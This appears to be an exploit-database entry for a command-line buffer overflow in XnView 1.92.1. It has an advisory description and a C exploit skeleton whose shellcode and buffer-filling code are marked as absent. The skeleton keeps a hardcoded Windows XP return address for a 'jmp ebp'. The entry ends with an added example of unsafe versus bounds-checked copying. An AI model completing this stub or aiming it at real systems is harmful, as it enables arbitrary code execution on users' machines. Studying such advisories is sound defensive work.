XnView 1.92.1 Command-Line Arguments Buffer Overflow Vulnerability

ID 1337DAY-ID-21860
Type zdt
Reporter Sylvain THUAL
Modified 2014-02-05T00:00:00


Exploit for windows platform in category remote exploits

source: http://www.securityfocus.com/bid/28259/info

XnView is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers may exploit this issue only if XnView is configured as a handler for other applications, so that it can be passed malicious filenames as command-line data.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will result in a denial of service.
This issue affects XnView 1.92.1; other versions may also be vulnerable.

#include <unistd.h>

/*
 * Size=164 bytes
 * Action: open calc.exe
 */
unsigned char shellcode[] =   /* payload bytes are not present in this copy */

/*
 * user32.dll ret address ==> jmp ebp
 * under Win XP pro SP2
 */
unsigned char ret[] = "\x34\x59\x40\x7e";

int main(int argc, char *argv[]) {
    char *bufExe[3];
    char buf[511];

    bufExe[0] = "xnview.exe";
    bufExe[2] = NULL;
    /* the code that fills buf and launches the process is not present in this copy */
    bufExe[1] = buf;
    return 0x0;
}
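
The root cause named in the description is an unchecked copy of a command-line filename into a fixed-size buffer. The following is an added example, not code from XnView or from the original advisory, showing that pattern beside a bounds-checked form; the function names, the status enum and the 260-byte buffer size are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed size for illustration; the page does not state XnView's real buffer size. */
#define PATH_BUF_SIZE 260

enum arg_status { ARG_OK = 0, ARG_INVALID, ARG_TOO_LONG };

/* The unsafe pattern the advisory describes, kept for contrast and never called:
   nothing compares the argument length with the destination size. */
void load_arg_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg); /* overflows a PATH_BUF_SIZE-byte dst once strlen(arg) >= PATH_BUF_SIZE */
}

/* Hardened form: reject rather than truncate, because a truncated path
   would silently name a different file. dst is always left NUL-terminated. */
enum arg_status load_arg_checked(char *dst, size_t dst_size, const char *arg)
{
    const char *nul;

    if (dst == NULL || dst_size == 0)
        return ARG_INVALID;
    dst[0] = '\0';
    if (arg == NULL || arg[0] == '\0')
        return ARG_INVALID;

    /* Look for the terminator within dst_size bytes only. */
    nul = memchr(arg, '\0', dst_size);
    if (nul == NULL)
        return ARG_TOO_LONG;

    memcpy(dst, arg, (size_t)(nul - arg) + 1); /* copy includes the NUL */
    return ARG_OK;
}

int main(int argc, char *argv[])
{
    char path[PATH_BUF_SIZE];
    enum arg_status st = load_arg_checked(path, sizeof path, argc > 1 ? argv[1] : NULL);

    if (st != ARG_OK) {
        fprintf(stderr, "rejected file argument (status %d)\n", (int)st);
        return 1;
    }
    printf("would open: %s\n", path);
    return 0;
}
```

Applications registered as file handlers receive filenames chosen by whatever invokes them, so the length check belongs at the point where the argument first enters a fixed-size buffer.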

